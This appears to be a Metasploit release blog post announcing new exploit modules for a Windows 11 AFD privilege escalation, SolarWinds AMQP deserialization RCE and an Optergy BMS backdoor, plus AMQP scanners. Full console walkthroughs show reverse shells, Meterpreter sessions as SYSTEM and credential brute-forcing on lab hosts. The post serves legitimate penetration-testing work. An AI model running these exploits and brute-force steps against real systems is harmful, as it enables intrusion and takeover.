Last updated at Thu, 18 Jan 2024 21:27:25 GMT
Windows 11 ADF WinSock Priv Esc
The new windows/local/cve_2023_21768_afd_lpe exploit makes use of a brand new Windows kernel exploitation technique that leverages the new I/O ring feature introduced in Windows 11 21H2. This technique comes from Yarden Shafir research and provides a full read/write primitive on Windows 11. This exploit is a write-where bug that allows arbitrary write of one byte in kernel memory. This is enough to modify the I/O ring internal structures and get remote code execution as the NT AUTHORITY\SYSTEM user. The Metasploit module is based on the exploit PoC authored by chompie1337 and b33f .
Example running with Windows 11 Version 22H2 Build 22621.963 x64:
msf6 exploit(windows/local/cve_2023_21768_afd_lpe) > run verbose=true
[*] Started reverse TCP handler on 192.168.100.9:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Windows Build Number = 22621.963
[+] The target appears to be vulnerable.
[*] Launching netsh to host the DLL...
[+] Process 3748 launched.
[*] Reflectively injecting the DLL into 3748...
[*] Sending stage (200774 bytes) to 192.168.100.9
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 11 opened (192.168.100.9:4444 -> 192.168.100.9:55346) at 2023-03-27 18:46:08 +0200
meterpreter >
SolarWinds RCE and AMQP Support
Metasploit 6.3.10 now has support for the Advanced Message Queuing Protocol (AMQP). This protocol is used in services such as RabbitMQ. Three new modules have been added that leverage this functionality thanks to the work of our very own Spencer McIntyre:
The exploits/windows/misc/solarwinds_amqp_deserialization module adds an exploit for CVE-2022-38108 which is an authenticated .NET deserialization vulnerability within the SolarWinds platform's SWIS (SolarWinds Information Service) component. To trigger the vulnerability, an attacker must authenticate to the RabbitMQ (message queue) server (via the AMQP protocol) and publish a specially crafted object. Once SWIS receives the message, it will deserialize it, allowing for OS command execution as NT AUTHORITY\SYSTEM. Example targeting SolarWinds Orion NPM 2020.2.6 on Windows Server 2019 x64:
msf6 > use exploit/windows/misc/solarwinds_amqp_deserialization
[*] Using configured payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set RHOSTS 192.168.159.17
RHOSTS => 192.168.159.17
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set USERNAME hax
USERNAME => hax
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > run
[*] Powershell command length: 4175
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.17:5671 - Successfully connected to the remote server.
[*] 192.168.159.17:5671 - Successfully opened a new channel.
[*] 192.168.159.17:5671 - Successfully published the message to the channel.
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.17:54960) at 2023-03-17 13:20:03 -0400
meterpreter >
The auxiliary/scanner/amqp/amqp_version module displays the version information about Advanced Message Queuing Protocol (AMQP) 0-9-1 servers:
msf6 > use auxiliary/scanner/amqp/amqp_version
msf6 auxiliary(scanner/amqp/amqp_version) > set RHOSTS 192.168.159.0/24
RHOSTS => 192.168.159.0/24
msf6 auxiliary(scanner/amqp/amqp_version) > run
[*] 192.168.159.17:5671 - AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PLAIN)
[*] 192.168.159.0/24:5671 - Scanned 51 of 256 hosts (19% complete)
[*] 192.168.159.0/24:5671 - Scanned 53 of 256 hosts (20% complete)
[*] 192.168.159.0/24:5671 - Scanned 98 of 256 hosts (38% complete)
[*] 192.168.159.128:5671 - AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
[*] 192.168.159.0/24:5671 - Scanned 104 of 256 hosts (40% complete)
[*] 192.168.159.0/24:5671 - Scanned 150 of 256 hosts (58% complete)
[*] 192.168.159.0/24:5671 - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.159.0/24:5671 - Scanned 199 of 256 hosts (77% complete)
[*] 192.168.159.0/24:5671 - Scanned 216 of 256 hosts (84% complete)
[*] 192.168.159.0/24:5671 - Scanned 233 of 256 hosts (91% complete)
[*] 192.168.159.0/24:5671 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/amqp/amqp_version) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.159.17 5671 tcp amqps open AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PL
AIN)
192.168.159.128 5671 tcp amqps open AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
msf6 auxiliary(scanner/amqp/amqp_version)
The new auxiliary/scanner/amqp/amqp_login module can be used to bruteforce service credentials:
msf6 > use auxiliary/scanner/amqp/amqp_login
msf6 auxiliary(scanner/amqp/amqp_login) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 auxiliary(scanner/amqp/amqp_login) > set USERNAME admin
USERNAME => admin
msf6 auxiliary(scanner/amqp/amqp_login) > set PASS_FILE data/wordlists/unix_passwords.txt
PASS_FILE => data/wordlists/unix_passwords.txt
msf6 auxiliary(scanner/amqp/amqp_login) > set RPORT 5672
RPORT => 5672
msf6 auxiliary(scanner/amqp/amqp_login) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 auxiliary(scanner/amqp/amqp_login) > run
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:Password1! (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:admin (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:12345 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456789 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[+] 192.168.159.128:5672 - Login Successful: admin:password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/amqp/amqp_login) >
New module content (5)
AMQP 0-9-1 Login Check Scanner
Author: Spencer McIntyre
Type: Auxiliary
Pull request: #17828 contributed by zeroSteiner
Description: This adds a login scanner module for AMQP services
AMQP 0-9-1 Version Scanner
Author: Spencer McIntyre
Type: Auxiliary
Pull request: #17827 contributed by zeroSteiner
Description: This adds a scanner module that extracts version information from AMQP protocol servers.
Optergy Proton and Enterprise BMS Command Injection using a backdoor
Authors: Gjoko Krstic and h00die-gr3y
Type: Exploit
Pull request: #17806 contributed by h00die-gr3y
AttackerKB reference: CVE-2019-7276
Description: This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise Building Management System (BMS) applications.
Ancillary Function Driver (AFD) for WinSock Elevation of Privilege
Authors: Christophe De La Fuente, Yarden Shafir, b33f, and chompie
Type: Exploit
Pull request: #17826 contributed by cdelafuente-r7
AttackerKB reference: CVE-2023-21768
Description: This PR adds an exploit module for CVE-2023-21768 that achieves local privilege escalation on Windows 11 2H22.
SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE
Authors: Justin Hong, Lucas Miller, Piotr Bazydło, and Spencer McIntyre
Type: Exploit
Pull request: #17785 contributed by zeroSteiner
AttackerKB reference: CVE-2022-38108
Description: This adds an exploit for an authenticated .NET deserialization vulnerability that affects the SolarWinds Information Service (SWIS) component within SolarWinds. The SWIS component will deserialize messages received by the AMQP message queue, resulting in command execution as NT AUTHORITY\SYSTEM.
Enhancements and features (6)
- #17724 from dwelch-r7 - Updates the
modules/auxiliary/admin/kerberos/forge_ticket.rbmodule with a newIncludeTicketChecksumoption. When set to true the forged PAC will include the PAC_TICKET_CHECKSUM required in newer Windows AD implementations - #17753 from adfoster-r7 - Updates the
auxiliary/admin/kerberos/get_ticketmodule to support using forged golden tickets. Users can now provide the Krb5Ccname option to supply the Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked for a valid TGT as normal - #17789 from bcoles - This PR add enhancements to the proftpd_modcopy_exec module. Enhancements include documentation, notes, a reference URL, and a few general code improvements to the check and exploit methods.
- #17789 from bcoles - This PR add enhancements to the proftpd_modcopy_exec module. Enhancements include documentation, notes, a reference URL, and a few general code improvements to the check and exploit methods.
- #17813 from samueloph - This sets the
CHECK_FALSEoption to true by default so that the scanner will bail upon detecting false positive results. - #17833 from adfoster-r7 - Updates the Metasploit RPC module.info command response to include whether or not the module supports a check method
Bugs fixed (6)
- #17704 from ide0x90 - Fixes a crash in
multi/http/solr_velocity_rcethat was discovered when targeting a machine running Apache Solr 8.3.0 on Linux that required authentication. - #17808 from adfoster-r7 - Updates multiple broken Secunia references in modules with equivalent links found within Wayback Machine - a digital archive of the world wide web founded by the Internet Archive.
- #17818 from adfoster-r7 - This PR fixes a crash in the RPC job info command.
- #17825 from dm-ct - Fixes broken documentation references in the
exploits/linux/local/zimbra_slapper_priv_escmodule - #17830 from bcoles - Fixes a crash when parsing dates in
./tools/modules/committer_count.rb - #17831 from dm-ct - Fixes broken documentation references in the
exploits/aix/rpc_cmsd_opcode21.rbmodule
Documentation
You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).
